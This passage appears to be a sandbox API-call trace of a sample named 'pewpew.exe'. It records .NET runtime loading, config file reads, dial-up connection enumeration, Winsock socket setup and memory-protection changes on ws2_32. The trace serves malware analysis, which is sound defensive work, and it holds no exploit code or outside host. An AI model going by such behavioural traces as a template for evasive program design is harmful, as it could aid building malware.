pbstr=0x6eb280*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux") returned 1 [0109.094] GetThreadLocale () returned 0x409 [0109.094] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0109.094] GetThreadLocale () returned 0x409 [0109.094] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0109.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x6eb004, lpFilePart=0x6eb000 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", lpFilePart=0x6eb000*="System.Xml.ni.dll.aux") returned 0x70 [0109.094] SysReAllocStringLen (in: pbstr=0x6eb280*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", len=0x70 | out: pbstr=0x6eb280*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux") returned 1 [0109.095] SysReAllocStringLen (in: pbstr=0x6eb230*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", len=0x70 | out: pbstr=0x6eb230*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux") returned 1 [0109.095] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", cchLength=0x70 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\427ed7b1258457fdb8be46e9dd87cbd2\\system.xml.ni.dll.aux") returned 0x70 [0109.095] SysReAllocStringLen (in: pbstr=0x6eb280*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\427ed7b1258457fdb8be46e9dd87cbd2\\system.xml.ni.dll.aux", len=0x70 | out: pbstr=0x6eb280*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\427ed7b1258457fdb8be46e9dd87cbd2\\system.xml.ni.dll.aux") returned 1 [0109.095] SetLastError (dwErrCode=0x0) [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] SetEvent (hEvent=0xbc) returned 1 [0109.095] GetFileSize (in: hFile=0x2f4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ec [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] GetCurrentThreadId () returned 0xb0c [0109.095] SetEvent (hEvent=0xbc) returned 1 [0109.095] ReadFile (in: hFile=0x2f4, lpBuffer=0xbaa6f0, nNumberOfBytesToRead=0x2ec, lpNumberOfBytesRead=0x6eb334, lpOverlapped=0x0 | out: lpBuffer=0xbaa6f0*, lpNumberOfBytesRead=0x6eb334*=0x2ec, lpOverlapped=0x0) returned 1 [0109.097] GetCurrentThreadId () returned 0xb0c [0109.097] ResetEvent (hEvent=0xb8) returned 1 [0109.097] GetCurrentThreadId () returned 0xb0c [0109.097] GetCurrentThreadId () returned 0xb0c [0109.097] GetCurrentThreadId () returned 0xb0c [0109.097] GetCurrentThreadId () returned 0xb0c [0109.097] ResetEvent (hEvent=0xb8) returned 1 [0109.097] GetCurrentThreadId () returned 0xb0c [0109.097] GetCurrentThreadId () returned 0xb0c [0109.097] SetEvent (hEvent=0xbc) returned 1 [0109.097] SetEvent (hEvent=0xb8) returned 1 [0109.097] CloseHandle (hObject=0x2f4) returned 1 [0109.104] SysReAllocStringLen (in: pbstr=0x6ea130*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6ea130*="kernel32.dll") returned 1 [0109.104] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0109.105] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0109.108] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0109.109] GetCurrentThreadId () returned 0xb0c [0109.109] ResetEvent (hEvent=0xb8) returned 1 [0109.109] GetCurrentThreadId () returned 0xb0c [0109.109] GetCurrentThreadId () returned 0xb0c [0109.109] GetCurrentThreadId () returned 0xb0c [0109.109] GetCurrentThreadId () returned 0xb0c [0109.109] ResetEvent (hEvent=0xb8) returned 1 [0109.109] GetCurrentThreadId () returned 0xb0c [0109.109] GetCurrentThreadId () returned 0xb0c [0109.109] SetEvent (hEvent=0xbc) returned 1 [0109.109] SetEvent (hEvent=0xb8) returned 1 [0109.109] CloseHandle (hObject=0x2f4) returned 1 [0109.113] SysReAllocStringLen (in: pbstr=0x6ea838*=0x0, psz="System.Xml.ni.dll", len=0x11 | out: pbstr=0x6ea838*="System.Xml.ni.dll") returned 1 [0109.113] CharLowerBuffW (in: lpsz="System.Xml.ni.dll", cchLength=0x11 | out: lpsz="system.xml.ni.dll") returned 0x11 [0109.114] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x71770000 [0109.189] GetLastError () returned 0x0 [0109.212] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6eda4c | out: TokenHandle=0x6eda4c*=0x2f0) returned 1 [0109.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x6ed52c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0109.217] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesEx") returned 0x0 [0109.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesExW") returned 0x76d44574 [0109.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x6eda4c | out: lpFileInformation=0x6eda4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0109.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x6ed4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0109.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x6eda4c | out: lpFileInformation=0x6eda4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0109.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x6ed484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0109.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ed978) returned 1 [0109.224] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f4 [0109.224] GetFileType (hFile=0x2f4) returned 0x1 [0109.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ed974) returned 1 [0109.224] GetFileType (hFile=0x2f4) returned 0x1 [0109.251] GetFileSize (in: hFile=0x2f4, lpFileSizeHigh=0x6eda40 | out: lpFileSizeHigh=0x6eda40*=0x0) returned 0x8c8f [0109.251] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed9fc, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed9fc*=0x1000, lpOverlapped=0x0) returned 1 [0109.269] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed898, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed898*=0x1000, lpOverlapped=0x0) returned 1 [0109.274] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed74c, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed74c*=0x1000, lpOverlapped=0x0) returned 1 [0109.274] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed74c, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed74c*=0x1000, lpOverlapped=0x0) returned 1 [0109.275] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed74c, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed74c*=0x1000, lpOverlapped=0x0) returned 1 [0109.275] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed684, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed684*=0x1000, lpOverlapped=0x0) returned 1 [0109.277] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed800, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed800*=0x1000, lpOverlapped=0x0) returned 1 [0109.278] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed714, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed714*=0x1000, lpOverlapped=0x0) returned 1 [0109.278] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed714, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed714*=0xc8f, lpOverlapped=0x0) returned 1 [0109.278] ReadFile (in: hFile=0x2f4, lpBuffer=0x384f3b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ed7d4, lpOverlapped=0x0 | out: lpBuffer=0x384f3b4*, lpNumberOfBytesRead=0x6ed7d4*=0x0, lpOverlapped=0x0) returned 1 [0109.279] CloseHandle (hObject=0x2f4) returned 1 [0109.280] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6edb80 | out: TokenHandle=0x6edb80*=0x2f4) returned 1 [0109.280] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6edb80 | out: TokenHandle=0x6edb80*=0x2f8) returned 1 [0109.280] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6eda4c | out: TokenHandle=0x6eda4c*=0x2fc) returned 1 [0109.281] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x6eda4c | out: lpFileInformation=0x6eda4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0109.281] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", nBufferLength=0x105, lpBuffer=0x6ed4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", lpFilePart=0x0) returned 0x37 [0109.281] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x6eda4c | out: lpFileInformation=0x6eda4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0109.281] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6edb80 | out: TokenHandle=0x6edb80*=0x300) returned 1 [0109.282] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6edb80 | out: TokenHandle=0x6edb80*=0x304) returned 1 [0109.292] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ed948 | out: TokenHandle=0x6ed948*=0x308) returned 1 [0109.307] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ed958 | out: TokenHandle=0x6ed958*=0x30c) returned 1 [0109.329] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ed620 | out: phkResult=0x6ed620*=0x0) returned 0x2 [0109.338] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x6eeb38 | out: phkResult=0x6eeb38*=0x310) returned 0x0 [0109.339] RegQueryValueExW (in: hKey=0x310, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x6eeb54, lpData=0x0, lpcbData=0x6eeb50*=0x0 | out: lpType=0x6eeb54*=0x0, lpData=0x0, lpcbData=0x6eeb50*=0x0) returned 0x2 [0109.339] RegCloseKey (hKey=0x310) returned 0x0 [0109.363] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0109.367] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x6ee1f8, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10204, lpName="Global\\NLS_CodePage_1252_3_2_0_0") returned 0x310 [0109.367] GetCurrentThreadId () returned 0xb0c [0109.367] ResetEvent (hEvent=0xb8) returned 1 [0109.367] GetCurrentThreadId () returned 0xb0c [0109.367] GetCurrentThreadId () returned 0xb0c [0109.367] GetCurrentThreadId () returned 0xb0c [0109.367] GetCurrentThreadId () returned 0xb0c [0109.367] ResetEvent (hEvent=0xb8) returned 1 [0109.367] GetCurrentThreadId () returned 0xb0c [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] SetEvent (hEvent=0xbc) returned 1 [0109.368] SetEvent (hEvent=0xb8) returned 1 [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] GetCurrentThreadId () returned 0xb0c [0109.368] SetEvent (hEvent=0xbc) returned 1 [0109.368] MapViewOfFile (hFileMappingObject=0x310, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2460000 [0109.399] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee700 | out: TokenHandle=0x6ee700*=0x314) returned 1 [0109.401] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee710 | out: TokenHandle=0x6ee710*=0x318) returned 1 [0109.409] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0109.409] QueryPerformanceFrequency (in: lpFrequency=0x545c60 | out: lpFrequency=0x545c60*=100000000) returned 1 [0109.412] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0109.413] QueryPerformanceCounter (in: lpPerformanceCount=0x6eeb14 | out: lpPerformanceCount=0x6eeb14*=22968887918) returned 1 [0109.415] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee6cc | out: TokenHandle=0x6ee6cc*=0x31c) returned 1 [0109.416] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee6dc | out: TokenHandle=0x6ee6dc*=0x320) returned 1 [0109.426] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee6e0 | out: TokenHandle=0x6ee6e0*=0x324) returned 1 [0109.427] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee6f0 | out: TokenHandle=0x6ee6f0*=0x328) returned 1 [0109.430] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee9fc | out: TokenHandle=0x6ee9fc*=0x32c) returned 1 [0109.432] SysReAllocStringLen (in: pbstr=0x6edda4*=0x0, psz="rasapi32.dll", len=0xc | out: pbstr=0x6edda4*="rasapi32.dll") returned 1 [0109.432] CharLowerBuffW (in: lpsz="rasapi32.dll", cchLength=0xc | out: lpsz="rasapi32.dll") returned 0xc [0109.432] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0109.432] GetLastError () returned 0x7e [0109.433] SetLastError (dwErrCode=0x7e) [0109.437] SysReAllocStringLen (in: pbstr=0x6edda4*=0x0, psz="rasapi32.dll", len=0xc | out: pbstr=0x6edda4*="rasapi32.dll") returned 1 [0109.438] CharLowerBuffW (in: lpsz="rasapi32.dll", cchLength=0xc | out: lpsz="rasapi32.dll") returned 0xc [0109.438] LoadLibraryExW (lpLibFileName="rasapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x746e0000 [0110.400] GetLastError () returned 0x0 [0110.400] GetProcAddress (hModule=0x746e0000, lpProcName="RasEnumConnections") returned 0x0 [0110.401] GetProcAddress (hModule=0x746e0000, lpProcName="RasEnumConnectionsW") returned 0x746e74af [0110.402] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemAlloc") returned 0x7666ea4c [0110.402] CoTaskMemAlloc (cb=0xcc0) returned 0xbb1ff8 [0110.402] RasEnumConnectionsW (in: param_1=0xbb1ff8, param_2=0x6eea0c, param_3=0x6eea10 | out: param_1=0xbb1ff8, param_2=0x6eea0c, param_3=0x6eea10) returned 0x0 [0110.644] GetCurrentThreadId () returned 0xb0c [0110.644] ResetEvent (hEvent=0xb8) returned 1 [0110.644] GetCurrentThreadId () returned 0xb0c [0110.644] GetCurrentThreadId () returned 0xb0c [0110.644] GetCurrentThreadId () returned 0xb0c [0110.644] GetCurrentThreadId () returned 0xb0c [0110.644] ResetEvent (hEvent=0xb8) returned 1 [0110.644] GetCurrentThreadId () returned 0xb0c [0110.644] GetCurrentThreadId () returned 0xb0c [0110.644] SetEvent (hEvent=0xbc) returned 1 [0110.644] SetEvent (hEvent=0xb8) returned 1 [0110.644] CloseHandle (hObject=0x354) returned 1 [0110.648] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0110.648] CoTaskMemFree (pv=0xbb1ff8) [0110.649] SysReAllocStringLen (in: pbstr=0x6edd7c*=0x0, psz="ws2_32.dll", len=0xa | out: pbstr=0x6edd7c*="ws2_32.dll") returned 1 [0110.649] CharLowerBuffW (in: lpsz="ws2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0110.649] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0110.650] GetLastError () returned 0x7e [0110.650] SetLastError (dwErrCode=0x7e) [0110.654] SysReAllocStringLen (in: pbstr=0x6edd7c*=0x0, psz="ws2_32.dll", len=0xa | out: pbstr=0x6edd7c*="ws2_32.dll") returned 1 [0110.654] CharLowerBuffW (in: lpsz="ws2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0110.654] LoadLibraryExW (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x0) returned 0x77230000 [0110.655] GetLastError () returned 0x0 [0110.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edd64*=0x77231128, NumberOfBytesToProtect=0x6edd68, NewAccessProtection=0x4, OldAccessProtection=0x6edd9c | out: BaseAddress=0x6edd64*=0x77231000, NumberOfBytesToProtect=0x6edd68, OldAccessProtection=0x6edd9c*=0x20) returned 0x0 [0110.655] GetCurrentProcess () returned 0xffffffff [0110.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edd64*=0x77231128, NumberOfBytesToProtect=0x6edd68, NewAccessProtection=0x20, OldAccessProtection=0x6edd9c | out: BaseAddress=0x6edd64*=0x77231000, NumberOfBytesToProtect=0x6edd68, OldAccessProtection=0x6edd9c*=0x4) returned 0x0 [0110.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edd64*=0x77231224, NumberOfBytesToProtect=0x6edd68, NewAccessProtection=0x4, OldAccessProtection=0x6edd9c | out: BaseAddress=0x6edd64*=0x77231000, NumberOfBytesToProtect=0x6edd68, OldAccessProtection=0x6edd9c*=0x20) returned 0x0 [0110.656] GetCurrentProcess () returned 0xffffffff [0110.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edd64*=0x77231224, NumberOfBytesToProtect=0x6edd68, NewAccessProtection=0x20, OldAccessProtection=0x6edd9c | out: BaseAddress=0x6edd64*=0x77231000, NumberOfBytesToProtect=0x6edd68, OldAccessProtection=0x6edd9c*=0x4) returned 0x0 [0110.656] GetCurrentProcess () returned 0xffffffff [0110.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edd64*=0x7723123c, NumberOfBytesToProtect=0x6edd68, NewAccessProtection=0x4, OldAccessProtection=0x6edd9c | out: BaseAddress=0x6edd64*=0x77231000, NumberOfBytesToProtect=0x6edd68, OldAccessProtection=0x6edd9c*=0x20) returned 0x0 [0110.656] GetCurrentProcess () returned 0xffffffff [0110.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edd64*=0x7723123c, NumberOfBytesToProtect=0x6edd68, NewAccessProtection=0x20, OldAccessProtection=0x6edd9c | out: BaseAddress=0x6edd64*=0x77231000, NumberOfBytesToProtect=0x6edd68, OldAccessProtection=0x6edd9c*=0x4) returned 0x0 [0110.657] GetProcAddress (hModule=0x77230000, lpProcName="WSAStartup") returned 0x77233ab2 [0110.657] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x6ee7f4 | out: lpWSAData=0x6ee7f4) returned 0 [0110.681] GetProcAddress (hModule=0x77230000, lpProcName="WSASocket") returned 0x0 [0110.682] GetProcAddress (hModule=0x77230000, lpProcName="WSASocketW") returned 0x77233cd3 [0110.682] GetProcAddress (hModule=0x77230000, lpProcName="setsockopt") returned 0x772341b6 [0110.682] GetProcAddress (hModule=0x77230000, lpProcName="WSAEventSelect") returned 0x7723648f [0110.682] GetProcAddress (hModule=0x77230000, lpProcName="ioctlsocket") returned 0x77233084 [0110.683] GetProcAddress (hModule=0x77230000, lpProcName="closesocket") returned 0x77233918 [0110.684] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x370 [0111.031] setsockopt (s=0x370, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0111.032] closesocket (s=0x370) returned 0 [0111.033] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x370 [0111.069] setsockopt (s=0x370, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0111.069] closesocket (s=0x370) returned 0 [0111.069] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x370 [0111.070] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x374 [0111.070] GetProcAddress (hModule=0x77230000, lpProcName="ioctlsocket") returned 0x77233084 [0111.070] ioctlsocket (in: s=0x370, cmd=-2147195266, argp=0x6eea14 | out: argp=0x6eea14) returned 0 [0111.071] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x378 [0111.071] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c [0111.071] ioctlsocket (in: s=0x378, cmd=-2147195266, argp=0x6eea14 | out: argp=0x6eea14) returned 0 [0111.072] GetProcAddress (hModule=0x77230000, lpProcName="WSAIoctl") returned 0x77232fe7 [0111.072] WSAIoctl (in: s=0x370, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x6ee9fc, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x6ee9fc, lpOverlapped=0x0) returned -1 [0111.077] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessage") returned 0x0 [0111.079] 